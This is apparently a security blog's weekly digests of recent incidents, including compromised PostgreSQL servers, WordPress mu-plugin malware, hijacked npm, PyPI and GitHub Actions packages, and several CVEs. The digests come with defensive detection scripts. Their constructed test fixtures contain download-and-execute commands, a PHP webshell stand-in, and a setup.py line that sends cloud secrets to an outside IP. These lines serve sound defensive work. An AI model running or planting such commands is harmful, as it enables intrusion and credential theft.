Human Factor Blog

how human behavior affects security

Programmer’s Digest #128

03/26/2025-04/02/2025 Over 1,500 PostgreSQL Servers Compromised, New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor And More.

1. Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

An ongoing campaign targets exposed PostgreSQL instances to deploy cryptocurrency miners, with over 1,500 victims reported. The activity is tied to the PG_MEM malware and leans on defense evasion such as fileless miner payloads and a unique binary hash per target, which sidesteps hash-based blocklists.

The campaign exploits weak PostgreSQL credentials and configurations, then abuses the COPY ... FROM PROGRAM command, which lets a superuser (or any member of the pg_execute_server_program role) run arbitrary shell commands on the database host. The attackers deploy a Base64-encoded shell script that disables competing miners and drops PG_CORE, along with an obfuscated Golang binary named postmaster, after PostgreSQL's own supervisor process. This binary creates a cron job for persistence, elevates privileges, and downloads the XMRig miner. Each compromised machine is assigned a unique mining worker; the campaign reportedly spans over 1,500 machines across multiple wallets.
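The only server-side signal of this technique that most deployments already have is statement logging. The script below is an added example (not from the Wiz report or any tooling it describes) that reads PostgreSQL statement logs, re-joins multi-line statements, and reports every COPY ... FROM PROGRAM or COPY ... TO PROGRAM, flagging the ones that look like a download-and-execute pipeline. The log lines, usernames and IP address are constructed for the demo; the log_line_prefix format is assumed to be the default-style '%m [%p] %u@%d '.

```python
import re

# Constructed sample of PostgreSQL statement logging (log_statement = 'all',
# log_line_prefix = '%m [%p] %u@%d '); not real data from the campaign.
SAMPLE_LOG = (
    "2025-03-28 10:02:11.117 UTC [4121] app@orders LOG:  statement: SELECT 1\n"
    "2025-03-28 10:02:13.902 UTC [4130] postgres@postgres LOG:  statement: "
    "COPY tmp_out FROM PROGRAM 'echo ZWNobyBoaQ== | base64 -d | sh'\n"
    "2025-03-28 10:02:14.015 UTC [4130] postgres@postgres LOG:  statement: copy tmp_out\n"
    "\tfrom program 'curl -s http://198.51.100.7/x | bash'\n"
    "2025-03-28 10:02:15.300 UTC [4122] app@orders LOG:  statement: "
    "COPY orders TO '/tmp/orders.csv' CSV\n"
    "2025-03-28 10:02:16.000 UTC [4130] postgres@postgres LOG:  statement: "
    "COPY (SELECT 1) TO PROGRAM 'id > /tmp/who'\n"
)

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<sql>.*)$", re.S)
# FROM PROGRAM runs the quoted command in a shell on the server; TO PROGRAM
# pipes query output into a shell command. Both deserve review.
COPY_PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\s+'((?:[^']|'')*)'", re.I | re.S)
# Substrings typical of a download-and-execute stager.
INDICATORS = ("base64 -d", "curl ", "wget ", "| sh", "| bash")


def _join_statements(text):
    """Re-attach continuation lines (PostgreSQL indents them with a tab)."""
    records = []
    for line in text.splitlines():
        if line[:1] in ("\t", " ") and records:
            records[-1] += "\n" + line.strip()
        else:
            records.append(line)
    return records


def find_program_copies(log_text):
    """Return one dict per COPY ... FROM/TO PROGRAM statement found in the log."""
    hits = []
    for rec in _join_statements(log_text):
        m = LINE_RE.match(rec)
        if not m:
            continue
        for direction, program in COPY_PROGRAM_RE.findall(m.group("sql")):
            program = program.replace("''", "'")  # undo SQL quote doubling
            hits.append({
                "ts": m.group("ts"), "user": m.group("user"), "db": m.group("db"),
                "direction": direction.upper(), "program": program,
                "suspicious": any(ind in program for ind in INDICATORS),
            })
    return hits


if __name__ == "__main__":
    for h in find_program_copies(SAMPLE_LOG):
        flag = "!!" if h["suspicious"] else "  "
        print(f"{flag} {h['ts']} {h['user']}@{h['db']} "
              f"COPY {h['direction']} PROGRAM: {h['program']}")
```

Any hit from an application role is a finding in itself: if the role can run COPY ... PROGRAM at all, it is a superuser or holds pg_execute_server_program, which an internet-facing application account never needs.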

2. New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth

Cybersecurity researchers have found an updated version of Hijack Loader, a malware loader that introduces new evasion techniques and enhances persistence. The loader now includes call stack spoofing to hide the origin of function calls and performs anti-VM checks to detect sandbox environments. First discovered in 2023, Hijack Loader delivers second-stage payloads like information stealers and bypasses security software.

The latest iteration adds call stack spoofing with fabricated stack frames to conceal the origin of malicious calls, integrates the Heaven’s Gate technique for process injection, and delays execution when it detects Avast Antivirus processes. Two new modules, ANTIVM and modTask, handle sandbox detection and persistence through scheduled tasks.

Meanwhile, Elastic Security Labs revealed a new malware family, SHELBY, which uses GitHub for command-and-control and data exfiltration. The loader communicates through commits to a private repository, so attackers can issue commands and retrieve data over traffic that blends in with ordinary GitHub use rather than through infrastructure of their own.

3. Hackers Abuse WordPress MU-Plugins to Hide Malicious Code

Hackers are increasingly using the WordPress mu-plugins directory to run malicious code on every page load while evading detection. Files placed in ‘wp-content/mu-plugins/’ are loaded automatically by WordPress without any activation step and cannot be deactivated from the admin dashboard, which is exactly what makes the directory attractive for planting a payload. Sucuri observed three kinds of malicious code there.

Mu-plugins can be used for legitimate functions, but their automatic execution makes them ideal for stealthy attacks. Sucuri identified three payloads:

  1. redirect.php – Redirects users to a fake browser update site to download malware.
  2. index.php – A webshell that fetches and executes PHP code remotely.
  3. custom-js-loader.php – Injects malicious JavaScript to hijack images and links.

These attacks can steal credentials, harm a site’s reputation, and install malware. To prevent infections, Sucuri advises keeping plugins updated, disabling unnecessary ones, and using strong passwords with multi-factor authentication. Because files in mu-plugins load without an activation step, it is also worth comparing the directory’s contents against what you expect to be there.
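The check above is easy to automate. The script below is an added example, not Sucuri's scanner or anything from WordPress itself: it walks a mu-plugins directory, reports any file that is not on an expected list, and reports PHP files containing patterns that match the three payloads described (forced redirects, remote code fetch with eval/base64_decode, injected remote script tags). The demo directory, its file contents and the example.invalid hostnames are constructed stand-ins; the filenames simply echo the ones in the list above.

```python
import os
import re
import tempfile

# Patterns that are rare in legitimate mu-plugins and common in the payloads
# described above (remote code fetch, obfuscation, forced redirects, injected JS).
INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "redirect": re.compile(r"\bheader\s*\(\s*['\"]Location:", re.I),
    "js_injection": re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]https?://", re.I),
    "shell_exec": re.compile(r"\b(system|exec|shell_exec|passthru|proc_open)\s*\(", re.I),
}


def scan_mu_plugins(mu_dir, expected=()):
    """Return sorted (relative_path, [reasons]) for every file that is not on the
    expected list or that contains one of the indicator patterns. Subdirectories
    are walked too, since a top-level loader file may include code from them."""
    findings = []
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, mu_dir).replace(os.sep, "/")
            reasons = []
            if rel not in expected:
                reasons.append("unexpected_file")
            if name.lower().endswith(".php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
                reasons += [label for label, rx in INDICATORS.items() if rx.search(src)]
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings)


def build_demo_dir():
    """Create a throwaway mu-plugins directory with one benign and three
    suspicious files (constructed stand-ins, not the real payloads)."""
    d = tempfile.mkdtemp(prefix="mu-plugins-")
    files = {
        "site-tweaks.php": "<?php add_filter('auto_update_plugin', '__return_true');\n",
        "redirect.php": "<?php if (!is_admin()) { header('Location: https://update.example.invalid/'); exit; }\n",
        "index.php": "<?php eval(base64_decode(file_get_contents('https://c2.example.invalid/p.txt')));\n",
        "custom-js-loader.php": "<?php add_action('wp_footer', function () {\n"
                                "  echo '<script src=\"https://cdn.example.invalid/x.js\"></script>'; });\n",
    }
    for name, body in files.items():
        with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return d


if __name__ == "__main__":
    demo = build_demo_dir()
    for rel, reasons in scan_mu_plugins(demo, expected=("site-tweaks.php",)):
        print(f"{rel}: {', '.join(reasons)}")
```

Run it against the real directory with the expected list taken from a known-good backup; an empty result is the goal, and "unexpected_file" alone is enough to warrant a look even when no indicator pattern fires.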

4. Multiple npm Crypto Packages Hijacked

Sonatype has uncovered multiple hijacked npm cryptocurrency packages designed to steal sensitive information like API keys and SSH keys. These packages, some of which have been on npm for up to 9 years, were recently updated with malicious, obfuscated scripts.

The hijacked packages, tracked as sonatype-2025-000924, include scripts that exfiltrate sensitive data to a remote server after installation. Notably, some packages had not been updated in years, like “bnb-javascript-sdk-nobroadcast,” which received a malicious release.

Sonatype researchers suspect the hijacks may be the result of compromised npm maintainer accounts, possibly due to credential stuffing or expired domain takeovers. This incident highlights the importance of securing developer accounts with two-factor authentication (2FA) and improving supply chain security practices. Developers must remain vigilant in monitoring third-party software registries to mitigate risks associated with malicious updates in open-source packages.
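One cheap registry-side heuristic follows directly from the "dormant for years, then a sudden release" pattern. The script below is an added example (not Sonatype's detection) that reads package metadata in the shape of the npm registry's "time" field, where each version maps to its publish timestamp, and flags packages whose newest release landed recently after a long gap since the previous one. The package names and timestamps are constructed; the thresholds are assumptions to tune per project.

```python
from datetime import datetime, timedelta, timezone

# Constructed registry metadata in the shape of the npm registry's "time" field
# (version -> publish timestamp). Package names are hypothetical.
SAMPLE_REGISTRY = {
    "example-wallet-sdk": {"time": {
        "created": "2016-05-01T09:00:00.000Z",
        "1.0.0": "2016-05-01T09:00:00.000Z",
        "1.4.2": "2019-02-10T12:00:00.000Z",
        "1.4.3": "2025-03-28T03:14:00.000Z",   # first release in six years
        "modified": "2025-03-28T03:14:00.000Z",
    }},
    "example-active-lib": {"time": {
        "created": "2025-01-05T10:00:00.000Z",
        "2.0.0": "2025-01-05T10:00:00.000Z",
        "2.1.0": "2025-03-20T10:00:00.000Z",
        "modified": "2025-03-20T10:00:00.000Z",
    }},
    "example-old-lib": {"time": {
        "created": "2018-01-01T00:00:00.000Z",
        "0.9.0": "2018-01-01T00:00:00.000Z",
        "1.0.0": "2018-06-01T00:00:00.000Z",
        "modified": "2018-06-01T00:00:00.000Z",
    }},
}
NOW = datetime(2025, 4, 1, tzinfo=timezone.utc)  # fixed clock for the demo


def _parse(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def release_history(time_field):
    """[(version, publish_time)] in chronological order, skipping the bookkeeping keys.
    Ordering is by publish time, not semver: a backported 1.4.3 published today
    is exactly the event we want to see last."""
    return sorted(((v, _parse(t)) for v, t in time_field.items()
                   if v not in ("created", "modified")), key=lambda p: p[1])


def flag_sudden_revival(registry, min_gap_days=365, recent_days=30, now=None):
    """Packages whose latest release landed within `recent_days` after a silence of
    at least `min_gap_days` since the previous release: (name, version, gap_days)."""
    now = now or datetime.now(timezone.utc)
    flagged = []
    for name, meta in registry.items():
        hist = release_history(meta["time"])
        if len(hist) < 2:
            continue  # a single release has no dormancy to measure
        (_, prev_time), (latest, latest_time) = hist[-2], hist[-1]
        gap = latest_time - prev_time
        if gap >= timedelta(days=min_gap_days) and now - latest_time <= timedelta(days=recent_days):
            flagged.append((name, latest, gap.days))
    return flagged


if __name__ == "__main__":
    for name, version, gap in flag_sudden_revival(SAMPLE_REGISTRY, now=NOW):
        print(f"{name}@{version}: first release after {gap} days of silence")
```

A flagged package is not proof of compromise, but it is the right moment to diff the new tarball against the previous one before letting a lockfile update through.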

5. RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

CISA has uncovered a new malware called RESURGE that exploits a now-patched vulnerability in Ivanti Connect Secure (ICS) appliances. RESURGE builds on SPAWNCHIMERA but adds distinct commands that alter its behavior, and it combines the roles of rootkit, dropper, backdoor, proxy, and tunneler. The underlying flaw, CVE-2025-0282, affects several Ivanti products and can lead to remote code execution. It has been weaponized to deliver the SPAWN malware ecosystem, linked to the China-based espionage group UNC5337. Notably, SPAWNCHIMERA, the earlier variant, was observed patching the same vulnerability after exploiting it.

RESURGE includes features like web shell deployment, credential harvesting, and manipulation of integrity checks. CISA also discovered two other malicious artifacts on compromised ICS devices. Organizations are urged to patch Ivanti systems, reset credentials, and monitor accounts for anomalous activity.


Programmer’s Digest #127

03/19/2025-03/26/2025 Update Next.js, Critical Ingress NGINX Controller Vulnerability, Authentication Bypass in VMware Windows Tools And More.

1. Warning For Developers, Web Admins: Update Next.js to Prevent Exploit

Developers using Next.js should install a security update for CVE-2025-29927, a critical authorization bypass that applies when the framework’s “middleware” function is enabled. Applications that rely on middleware for security checks are at serious risk: the bypass is trivial, letting an attacker skip those checks and tamper with security controls, potentially reaching admin functionality. All Next.js versions from 11.1.4 onward are affected. Users should upgrade to 15.2.3 (for 15.x) or 14.2.25 (for 14.x).

Applications hosted on Vercel or Netlify, or those not using middleware, are unaffected. If patching isn’t possible, Vercel advises blocking external requests that carry the x-middleware-subrequest header before they reach the application. Johannes Ullrich of the SANS Internet Storm Center noted that similar vulnerabilities have appeared in other commercial tools.
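The interim mitigation is a filter in front of the application. As an added illustration, not Vercel's or Next.js's own code, the block below implements it as a WSGI wrapper, the kind of thing a Python reverse proxy or API gateway would host: any request arriving with the header is refused with 403. The practitioner detail it shows is that HTTP header names are case-insensitive, so a raw-header match must lower-case before comparing, while WSGI has already normalised the name to HTTP_X_MIDDLEWARE_SUBREQUEST. The upstream app, paths and header value are constructed for the demo.

```python
BLOCKED_HEADER = "x-middleware-subrequest"


def carries_blocked_header(headers, name=BLOCKED_HEADER):
    """True if a raw header list contains `name`. Header names are
    case-insensitive, so an exact-string match would miss X-Middleware-SubRequest."""
    return any(k.lower() == name.lower() for k, _ in headers)


class RejectMiddlewareSubrequest:
    """WSGI wrapper that refuses any request arriving with the header. WSGI has
    already normalised the name to HTTP_X_MIDDLEWARE_SUBREQUEST, whatever the
    client's casing, so one environ lookup covers every spelling."""
    ENV_KEY = "HTTP_" + BLOCKED_HEADER.upper().replace("-", "_")

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if self.ENV_KEY in environ:
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"forbidden\n"]
        return self.app(environ, start_response)


def upstream_app(environ, start_response):
    """Stand-in for the proxied Next.js application."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello from " + environ.get("PATH_INFO", "/").encode()]


def run_request(app, environ):
    """Drive a WSGI app for one request and return (status, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body


guarded = RejectMiddlewareSubrequest(upstream_app)

if __name__ == "__main__":
    print(run_request(guarded, {"REQUEST_METHOD": "GET", "PATH_INFO": "/admin"}))
    print(run_request(guarded, {"REQUEST_METHOD": "GET", "PATH_INFO": "/admin",
                                "HTTP_X_MIDDLEWARE_SUBREQUEST": "x"}))
```

Rejecting outright is the safer choice over silently stripping the header, because a 403 shows up in access logs and tells you someone is probing; no legitimate external client sends this header.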

2. Critical Ingress NGINX Controller Vulnerability Allows RCE Without Authentication

Five vulnerabilities, collectively dubbed IngressNightmare, have been found in the Ingress NGINX Controller for Kubernetes, exposing over 6,500 clusters to unauthenticated remote code execution. The most severe, CVE-2025-1974, carries a CVSS score of 9.8; chained together the flaws let attackers read all secrets across namespaces, potentially leading to cluster takeover. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, CVE-2025-1974) abuse the admission controller, which accepts connections without authentication and is reachable over the pod network. Attackers can inject arbitrary NGINX configuration via malicious ingress objects and execute code within the controller pod.

Cloud security firm Wiz warns that 43% of cloud environments are at risk. The Kubernetes Security Response Committee has patched the flaws in Ingress NGINX Controller versions 1.12.1, 1.11.5, and 1.10.7.

Admins should update immediately and ensure the admission webhook endpoint is not publicly exposed to mitigate risks.
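With three fixed releases on three minor branches, the first triage step is deciding, per cluster, whether the running controller image predates the fix for its branch. The function below is an added example (not a Kubernetes project tool) that parses controller image references as they appear in pod specs, including a trailing @sha256 digest, and classifies them against the fixed versions named above. The image references are constructed; the rule that branches older than 1.10 never received a fix while minors newer than 1.12 were cut after it is this example's assumption.

```python
import re

# Fixed releases per supported minor branch, from the advisory text above.
FIXED = {(1, 10): (1, 10, 7), (1, 11): (1, 11, 5), (1, 12): (1, 12, 1)}
OLDEST_FIXED_MINOR = min(FIXED)  # (1, 10)

# Constructed pod image references, as `kubectl get pods -A -o jsonpath` might list them.
SAMPLE_IMAGES = [
    "registry.k8s.io/ingress-nginx/controller:v1.11.4",
    "registry.k8s.io/ingress-nginx/controller:v1.11.5",
    "registry.k8s.io/ingress-nginx/controller:v1.12.1@sha256:0123456789abcdef",
    "registry.k8s.io/ingress-nginx/controller:v1.9.6",
    "registry.k8s.io/ingress-nginx/controller@sha256:fedcba9876543210",  # digest only
]


def parse_version(image):
    """Extract (major, minor, patch) from an image reference; None if there is no
    version tag (digest-only references must be resolved against the registry)."""
    tag = image.rsplit("/", 1)[-1]   # drop the registry/repository path
    tag = tag.split("@", 1)[0]       # drop a digest suffix
    m = re.search(r"(?:^|:)v?(\d+)\.(\d+)\.(\d+)", tag)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(image):
    """True/False, or None when the version cannot be determined from the tag."""
    ver = parse_version(image)
    if ver is None:
        return None
    branch = ver[:2]
    if branch in FIXED:
        return ver < FIXED[branch]
    # Assumption: branches older than the oldest patched line never got a fix;
    # minors newer than the newest patched line were released after it.
    return branch < OLDEST_FIXED_MINOR


def triage(images):
    """Group image references into vulnerable / fixed / unknown buckets."""
    out = {"vulnerable": [], "fixed": [], "unknown": []}
    for img in images:
        v = is_vulnerable(img)
        out["unknown" if v is None else ("vulnerable" if v else "fixed")].append(img)
    return out


if __name__ == "__main__":
    for bucket, imgs in triage(SAMPLE_IMAGES).items():
        print(bucket)
        for img in imgs:
            print("  ", img)
```

The "unknown" bucket matters: a controller deployed by digest alone looks patched to a naive tag grep and needs the digest resolved before it can be cleared.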

3. Broadcom Warns of Authentication Bypass in VMware Windows Tools

Broadcom released security updates to fix a high-severity authentication bypass flaw (CVE-2025-22230) in VMware Tools for Windows. This vulnerability, caused by improper access control, allows local attackers with low privileges to gain high privileges on vulnerable VMs. “A malicious actor with non-administrative privileges on a Windows guest VM may perform certain high-privilege operations,” VMware warned in a security advisory.

Earlier this month, Broadcom patched three VMware zero-days (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226) exploited in attacks. Shortly after, over 37,000 VMware ESXi instances were found exposed to CVE-2025-22224.

4. Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories’ CI/CD Secrets Exposed

A supply chain attack on the GitHub Action “tj-actions/changed-files” initially targeted Coinbase’s open-source project, agentkit, before expanding. The attacker compromised the GitHub Action to leak repository secrets, earning CVE-2025-30066 (CVSS 8.6).

Endor Labs found 218 repositories exposed secrets, including credentials for DockerHub, npm, AWS, and GitHub tokens. Another compromised GitHub Action, “reviewdog/action-setup” (CVE-2025-30154), enabled attackers to modify “tj-actions/changed-files,” affecting all dependent repositories.

The attacker used obfuscation techniques, including dangling commits and temporary accounts, to evade detection. While GitHub found no evidence of a platform compromise, the attack suggests deep knowledge of CI/CD security.

Initially targeting Coinbase, the attacker may have shifted to a broader campaign after Coinbase mitigated the threat. The motive remains unclear but is likely financial, possibly involving cryptocurrency theft. Coinbase has since remediated the attack.

5. CISA Adds NAKIVO Vulnerability to KEV Catalog Amid Active Exploitation

CISA has added a high-severity flaw in NAKIVO Backup & Replication (CVE-2024-48248, CVSS 8.6) to its Known Exploited Vulnerabilities (KEV) catalog. The path traversal bug allows unauthenticated attackers to read sensitive files, including stored credentials. It affects versions before 10.11.3.86570 and was patched in v11.0.0.88174.

Two other vulnerabilities were also added:

  • CVE-2025-1316 (CVSS 9.3): A remote code execution flaw in Edimax IC-7100 IP cameras, exploited to deploy Mirai botnet variants. (Unpatched)
  • CVE-2017-12637 (CVSS 7.5): A directory traversal flaw in SAP NetWeaver AS Java, used to steal sensitive SAP system files, potentially leading to full system compromise.

Federal agencies must apply mitigations by April 9, 2025. SAP cybersecurity firm Onapsis reports active exploitation of CVE-2017-12637, with attackers leveraging it to extract privileged credentials and gain full access to vulnerable SAP applications.


Programmer’s Digest #126

03/12/2025-03/19/2025 Critical mySCADA myPRO Flaws, GitHub Action Hack, Malicious PyPI Packages Stole Cloud Tokens And More.

1. Critical mySCADA myPRO Flaws Could Let Attackers Take Over Industrial Control Systems

Cybersecurity researchers have disclosed two critical flaws in mySCADA myPRO, a SCADA system used in operational technology (OT) environments. These vulnerabilities could allow attackers to take control of affected systems.

Swiss security firm PRODAFT warns that exploitation could lead to severe operational disruptions and financial losses. Both flaws, rated 9.3 on the CVSS v4 scale, involve OS command injection via specially crafted POST requests:

  • CVE-2025-20014 – OS command injection via the version parameter.
  • CVE-2025-20061 – OS command injection via the email parameter.

Successful attacks could enable arbitrary code execution. The flaws stem from improper input sanitization and have been patched in:

  • mySCADA PRO Manager 1.3
  • mySCADA PRO Runtime 9.2.1

PRODAFT stresses the need for stronger SCADA security. Organizations should apply patches, isolate SCADA from IT networks, enforce strong authentication, and monitor for threats.

2. GitHub Action Hack Likely Led to Another in Cascading Supply Chain Attack

A cascading supply chain attack started with the compromise of reviewdog/action-setup@v1 and led to the breach of tj-actions/changed-files, exposing CI/CD secrets. Attackers modified tj-actions/changed-files, an action used by more than 23,000 repositories, so that it wrote secrets to workflow logs. Where those logs were public, the credentials were effectively leaked.

Wiz researchers believe the root cause was reviewdog/action-setup, which was compromised to inject a base64-encoded payload that dumped secrets to logs. Because tj-actions/eslint-changed-files consumed that action, the attackers likely harvested its Personal Access Token (PAT) from a workflow run and used it to tamper with tj-actions/changed-files.

Other potentially affected actions:

  • reviewdog/action-shellcheck
  • reviewdog/action-composite-template
  • reviewdog/action-staticcheck

Mitigation: Developers should search their workflows for references to reviewdog/action-setup@v1, remove affected actions, delete logs, and rotate secrets. To prevent future breaches, pin actions to full commit SHAs rather than mutable tags, and use GitHub’s policy setting that restricts which actions a repository may run.

Swift action is needed to minimize risk from leaked CI/CD secrets.
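Both the tj-actions item in Digest #127 and this one come down to the same audit: find every third-party action a workflow pulls in, and check whether it is pinned to an immutable commit SHA or to a tag that an attacker who controls the repository can move. The script below is an added example (not GitHub's tooling) that does that with a plain regex over workflow YAML, so it needs no YAML library, and additionally flags the actions named in the two write-ups. The sample workflow is constructed and its checkout SHA is a placeholder, not a real commit.

```python
import re

# Actions named in the two write-ups above as compromised or potentially affected.
KNOWN_COMPROMISED = {
    "tj-actions/changed-files", "reviewdog/action-setup", "reviewdog/action-shellcheck",
    "reviewdog/action-composite-template", "reviewdog/action-staticcheck",
}
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# Matches `uses:` lines, whether or not they start a list item or are quoted.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)", re.M)

# Constructed workflow; the checkout SHA is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # v4
      - uses: tj-actions/changed-files@v45
      - name: lint
        uses: reviewdog/action-setup@v1
      - uses: ./.github/actions/local-thing
      - uses: actions/setup-node@v4
"""


def audit_workflow(text):
    """Return (ref, [reasons]) for every remote action that is not pinned to a
    full commit SHA or that appears on the known-compromised list."""
    findings = []
    for ref in USES_RE.findall(text):
        if ref.startswith(("./", "docker://")):
            continue  # local or container actions: no GitHub tag to retarget
        action, _, version = ref.partition("@")
        repo = "/".join(action.split("/")[:2])  # owner/repo, ignoring any subpath
        reasons = []
        if not SHA_RE.match(version):
            reasons.append("mutable_ref")  # a tag or branch can be moved to a malicious commit
        if repo in KNOWN_COMPROMISED:
            reasons.append("known_compromised")
        if reasons:
            findings.append((ref, reasons))
    return findings


if __name__ == "__main__":
    for ref, reasons in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{ref}: {', '.join(reasons)}")
```

A SHA pin only helps if the SHA you pinned was clean, which is why the known-compromised check stays even for pinned references; in the tj-actions incident the tags were retargeted, so repositories pinned to a SHA were the ones that did not pull the malicious commit.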

3. Malicious PyPI Packages Stole Cloud Tokens—Over 14,100 Downloads Before Removal

Cybersecurity researchers warn of a malicious campaign targeting PyPI users with fake “time”-themed packages designed to steal cloud access tokens.

ReversingLabs identified 20 such packages, downloaded over 14,100 times, including acloud-client (5,496 downloads) and snapshot-photo (2,448 downloads). These packages either upload stolen data or impersonate cloud service clients (AWS, Alibaba Cloud, Tencent Cloud) to exfiltrate secrets.

Three packages—acloud-client, enumer-iam, and tcloud-python-test—were dependencies of accesskey_tools, a GitHub project with 519 stars and 42 forks, suggesting a widespread impact. The malicious packages have now been removed from PyPI.

Meanwhile, Fortinet FortiGuard Labs found thousands of suspicious PyPI and npm packages embedding malicious install scripts or communicating with command-and-control (C&C) servers.

Mitigation: Developers should monitor dependencies for suspicious URLs and scrutinize package sources to prevent data theft and malware infections.
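"Monitor dependencies for suspicious URLs" is more useful when the URLs are pulled out automatically and weighed by where they sit. The function below is an added example (not ReversingLabs' or Fortinet's tooling) that extracts URLs from a package's files, reports hosts that are IP literals or outside a trusted set, and marks URLs found in install-time code such as setup.py, which runs on pip install before anything is imported. The package contents, hostnames and the trusted list are constructed; the exfiltration line is a deliberately malicious stand-in for the demo.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")

# Constructed package tree: a setup.py that phones home plus innocent files.
SAMPLE_PACKAGE = {
    "setup.py": (
        "from setuptools import setup\n"
        "import urllib.request, os\n"
        "urllib.request.urlopen('http://203.0.113.9/c?k=' + os.environ.get('AWS_SECRET_ACCESS_KEY', ''))\n"
        "setup(name='example-cloud-client', version='0.1')\n"
    ),
    "README.md": "See https://docs.python.org/3/ and https://pypi.org/project/example-cloud-client/\n",
    "example_cloud_client/__init__.py": "ENDPOINT = 'https://api.example-cloud.invalid/v1'\n",
}
# Hosts a package from a public index may legitimately reference (an assumption).
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org", "docs.python.org", "github.com"}


def _host_is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_urls(files, trusted=TRUSTED_HOSTS):
    """(path, url, reason) for every URL whose host is an IP literal or is not in
    `trusted` (or a subdomain of it). URLs in setup.py get an extra marker because
    that code executes at install time."""
    out = []
    for path, text in files.items():
        for url in URL_RE.findall(text):
            host = urlsplit(url).hostname or ""
            if _host_is_ip(host):
                reason = "ip_literal_host"
            elif host in trusted or any(host.endswith("." + t) for t in trusted):
                continue
            else:
                reason = "untrusted_host"
            if path.endswith("setup.py"):
                reason += "+install_time"  # runs on `pip install`, before any import
            out.append((path, url, reason))
    return out


if __name__ == "__main__":
    for path, url, reason in suspicious_urls(SAMPLE_PACKAGE):
        print(f"{path}: {url} [{reason}]")
```

An API endpoint in library code is expected for a genuine cloud client, so "untrusted_host" on its own is a prompt to verify the domain; a network call from setup.py to a bare IP is the pattern worth blocking outright.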

4. OBSCURE#BAT Malware Uses Fake CAPTCHA Pages to Deploy Rootkit r77 and Evade Detection

A new malware campaign, OBSCURE#BAT, uses social engineering to deploy the r77 rootkit, enabling persistence and evasion on infected systems. The attackers remain unidentified. The rootkit hides files, registry keys, and tasks with a specific prefix. It spreads through fake software downloads and CAPTCHA scams, mainly targeting users in the U.S., Canada, Germany, and the U.K.

Initial infection methods include:

  • Fake Cloudflare CAPTCHA pages (ClickFix strategy)
  • Malware disguised as legitimate tools like Tor Browser and VoIP software

Once executed, a batch script runs PowerShell commands to modify the Windows Registry, set up scheduled tasks, and install a stealthy rootkit (ACPIx86.sys). The malware also patches AMSI to bypass antivirus detection and monitors clipboard activity for potential data theft.

OBSCURE#BAT demonstrates advanced evasion techniques, making detection difficult. Security researchers warn that its persistence mechanisms ensure it survives reboots and injects into critical processes like winlogon.exe.
